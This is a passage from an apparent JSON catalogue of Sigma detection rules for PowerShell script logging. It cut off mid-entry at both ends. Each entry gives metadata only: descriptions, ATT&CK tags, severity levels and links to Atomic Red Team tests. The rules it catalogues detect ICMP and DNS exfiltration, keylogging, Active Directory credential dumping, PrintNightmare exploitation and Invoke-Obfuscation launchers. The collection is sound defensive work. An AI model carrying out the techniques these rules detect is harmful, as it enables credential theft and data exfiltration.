- "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.\nAdversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,\nincluding whether or not the adversary fully infects the target and/or attempts specific actions.\n",
- "uuid": "d23f2ba5-9da0-4463-8908-8ee47f614bb9",
- "value": "Powershell File and Directory Discovery",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_file_and_directory_discovery.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1083"
- ],
- "creation_date": "2021/12/15",
- "filename": "posh_ps_file_and_directory_discovery.yml",
- "author": "frack113",
- "level": "low",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n",
- "uuid": "95afc12e-3cbb-40c3-9340-84a032e596a3",
- "value": "Service Registry Permissions Weakness Check",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness",
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1574.011"
- ],
- "creation_date": "2021/12/30",
- "filename": "posh_ps_get_acl_service.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Legitimate administrative script"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers within Active Directory.",
- "uuid": "36bed6b2-e9a0-4fff-beeb-413a92b86138",
- "value": "Active Directory Computers Enumeration with Get-AdComputer",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adcomputer.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1018"
- ],
- "creation_date": "2022/03/17",
- "filename": "posh_ps_get_adcomputer.yml",
- "author": "frack113",
- "level": "low",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory",
- "uuid": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee",
- "value": "Active Directory Group Enumeration With Get-AdGroup",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adgroup.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1069.002"
- ],
- "creation_date": "2022/03/17",
- "filename": "posh_ps_get_adgroup.yml",
- "author": "frack113",
- "level": "low",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n",
- "uuid": "060c3ef1-fd0a-4091-bf46-e7d625f60b73",
- "value": "Suspicious Get-ADReplAccount",
- "meta": {
- "refs": [
- "https://www.powershellgallery.com/packages/DSInternals",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.006"
- ],
- "creation_date": "2022/02/06",
- "filename": "posh_ps_get_adreplaccount.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Legitimate PowerShell scripts"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n",
- "uuid": "e0565f5d-d420-4e02-8a68-ac00d864f9cf",
- "value": "Automated Collection Bookmarks Using Get-ChildItem PowerShell",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1217"
- ],
- "creation_date": "2021/12/13",
- "filename": "posh_ps_get_childitem_bookmarks.yml",
- "author": "frack113",
- "level": "low",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers",
- "uuid": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c",
- "value": "PowerShell Hotfix Enumeration",
- "meta": {
- "refs": [
- "https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml"
- ],
- "tags": [
- "attack.discovery"
- ],
- "creation_date": "2022/06/21",
- "filename": "posh_ps_hotfix_enum.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Legitimate administration scripts"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.",
- "uuid": "4c4af3cd-2115-479c-8193-6b8bfce9001c",
- "value": "PowerShell ICMP Exfiltration",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_icmp_exfiltration.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "attack.t1048.003"
- ],
- "creation_date": "2020/10/10",
- "filename": "posh_ps_icmp_exfiltration.yml",
- "author": "Bartlomiej Czyz @bczyz1, oscd.community",
- "level": "medium",
- "falsepositive": [
- "Legitimate usage of System.Net.NetworkInformation.Ping class"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects powershell scripts that import modules from suspicious directories",
- "uuid": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab",
- "value": "Import PowerShell Modules From Suspicious Directories",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2022/07/07",
- "filename": "posh_ps_import_module_susp_dirs.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.",
- "uuid": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6",
- "value": "Execute Invoke-command on Remote Host",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command",
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.2",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_command_remote.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.t1021.006"
- ],
- "creation_date": "2022/01/07",
- "filename": "posh_ps_invoke_command_remote.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Legitimate script"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel",
- "uuid": "d59d7842-9a21-4bc6-ba98-64bfe0091355",
- "value": "Powershell DNSExfiltration",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh",
- "https://github.com/Arno0x/DNSExfiltrator",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "attack.t1048"
- ],
- "creation_date": "2022/01/07",
- "filename": "posh_ps_invoke_dnsexfiltration.yml",
- "author": "frack113",
- "level": "high",
- "falsepositive": [
- "Legitimate script"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Commandlet name for PrintNightmare exploitation.",
- "uuid": "6d3f1399-a81c-4409-aff3-1ecfe9330baf",
- "value": "PrintNightmare Powershell Exploitation",
- "meta": {
- "refs": [
- "https://github.com/calebstewart/CVE-2021-1675",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_nightmare.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1548"
- ],
- "creation_date": "2021/08/09",
- "filename": "posh_ps_invoke_nightmare.yml",
- "author": "Max Altgelt, Tobias Michalski",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Obfuscated use of Clip.exe to execute PowerShell",
- "uuid": "73e67340-0d25-11eb-adc1-0242ac120002",
- "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell",
- "meta": {
- "refs": [
- "https://github.com/Neo23x0/sigma/issues/1009",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027",
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2020/10/13",
- "filename": "posh_ps_invoke_obfuscation_clip.yml",
- "author": "Jonathan Cheong, oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014",
- "uuid": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7",
- "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell",
- "meta": {
- "refs": [
- "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027",
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2019/11/08",
- "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml",
- "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Obfuscated use of stdin to execute PowerShell",
- "uuid": "779c8c12-0eb1-11eb-adc1-0242ac120002",
- "value": "Invoke-Obfuscation STDIN+ Launcher - Powershell",
- "meta": {
- "refs": [
- "https://github.com/Neo23x0/sigma/issues/1009",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027",
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2020/10/15",
- "filename": "posh_ps_invoke_obfuscation_stdin.yml",
- "author": "Jonathan Cheong, oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Obfuscated use of Environment Variables to execute PowerShell",
- "uuid": "0adfbc14-0ed1-11eb-adc1-0242ac120002",
- "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell",
- "meta": {
- "refs": [
- "https://github.com/Neo23x0/sigma/issues/1009",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027",
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2020/10/15",
- "filename": "posh_ps_invoke_obfuscation_var.yml",
- "author": "Jonathan Cheong, oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION",
- "uuid": "20e5497e-331c-4cd5-8d36-935f6e2a9a07",
- "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell",
- "meta": {
- "refs": [
- "https://github.com/Neo23x0/sigma/issues/1009",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027",
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2020/10/18",
- "filename": "posh_ps_invoke_obfuscation_via_compress.yml",
- "author": "Timur Zinniatullin, oscd.community",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER",
- "uuid": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0",
- "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell",
- "meta": {
- "refs": [
- "https://github.com/Neo23x0/sigma/issues/1009",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027",
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2020/10/18",
- "filename": "posh_ps_invoke_obfuscation_via_rundll.yml",
- "author": "Timur Zinniatullin, oscd.community",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "ps_script",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Obfuscated Powershell via Stdin in Scripts",
- "uuid": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7",
- "value": "Invoke-Obfuscation Via Stdin - Powershell",
- "meta": {
- "refs": [
- "https://github.com/Neo23x0/sigma/issues/1009",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027",
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2020/10/12",
- "filename": 
"posh_ps_invoke_obfuscation_via_stdin.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "uuid": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", - "value": "Invoke-Obfuscation Via Use Clip - Powershell", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/09", - "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "uuid": "e55a5195-4724-480e-a77e-3ebe64bd3759", - "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/08", - "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "uuid": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", - "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", - 
"meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/10/08", - "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "uuid": "e54f5149-6ba3-49cf-b153-070d24679126", - "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/13", - "filename": "posh_ps_invoke_obfuscation_via_var.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", - "uuid": "34f90d3c-c297-49e9-b26d-911b05a4866c", - "value": "Powershell Keylogging", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_keylogging.yml" - ], - "tags": 
[ - "attack.collection", - "attack.t1056.001" - ], - "creation_date": "2021/07/30", - "filename": "posh_ps_keylogging.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", - "uuid": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", - "value": "Powershell LocalAccount Manipulation", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_localuser.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2021/12/28", - "filename": "posh_ps_localuser.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate administrative script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "uuid": "4a241dea-235b-4a7e-8d76-50d817b146c4", - "value": "Suspicious PowerShell Mailbox Export to Share - PS", - "meta": { - "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2481", - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", - "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", - 
"https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" - ], - "tags": [ - "attack.exfiltration" - ], - "creation_date": "2022/10/26", - "filename": "posh_ps_mailboxexport_share.yml", - "author": "Nasreddine Bencherchali", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "uuid": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", - "value": "Malicious PowerShell Commandlets", - "meta": { - "refs": [ - "https://adsecurity.org/?p=2921", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/05", - "filename": "posh_ps_malicious_commandlets.yml", - "author": "Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update), Nasreddine Bencherchali (update), Tim Shelton (fp), Mustafa Kaan Demir (update), Georg Lauenstein 
(update)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects keywords from well-known PowerShell exploitation frameworks", - "uuid": "f62176f3-8128-4faa-bf6c-83261322e5eb", - "value": "Malicious PowerShell Keywords", - "meta": { - "refs": [ - "https://adsecurity.org/?p=2921", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/05", - "filename": "posh_ps_malicious_keywords.yml", - "author": "Sean Metcalf (source), Florian Roth (rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", - "uuid": "cd185561-4760-45d6-a63e-a51325112cae", - "value": "Live Memory Dump Using Powershell", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml" - ], - "tags": [ - "attack.t1003" - ], - "creation_date": "2021/09/21", - "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml", - "author": "Max Altgelt", - "level": "high", - "falsepositive": [ - "Diagnostics" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", - "uuid": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", - "value": "Modify Group Policy Settings - ScriptBlockLogging", - "meta": { - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484.001" - ], - "creation_date": "2022/08/19", - "filename": "posh_ps_modify_group_policy_settings.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", - "uuid": "78aa1347-1517-4454-9982-b338d6df8343", - "value": "Powershell MsXml COM Object", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt", - "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", - "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/01/19", - "filename": "posh_ps_msxml_com.yml", - "author": "frack113, MatilJ", - "level": "medium", - "falsepositive": [ - "Legitimate administrative script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects 
Commandlet names and arguments from the Nishang exploitation framework", - "uuid": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", - "value": "Malicious Nishang PowerShell Commandlets", - "meta": { - "refs": [ - "https://github.com/samratashok/nishang", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/05/16", - "filename": "posh_ps_nishang_malicious_commandlets.yml", - "author": "Alec Costello", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", - "uuid": "8c521530-5169-495d-a199-0a3a881ad24e", - "value": "NTFS Alternate Data Stream", - "meta": { - "refs": [ - "http://www.powertheshell.com/ntfsstreams/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2018/07/24", - "filename": "posh_ps_ntfs_ads_access.yml", - "author": "Sami Ruohonen", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", - "uuid": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", - "value": "Code Executed Via Office Add-in XLL File", - "meta": { - "refs": [ - 
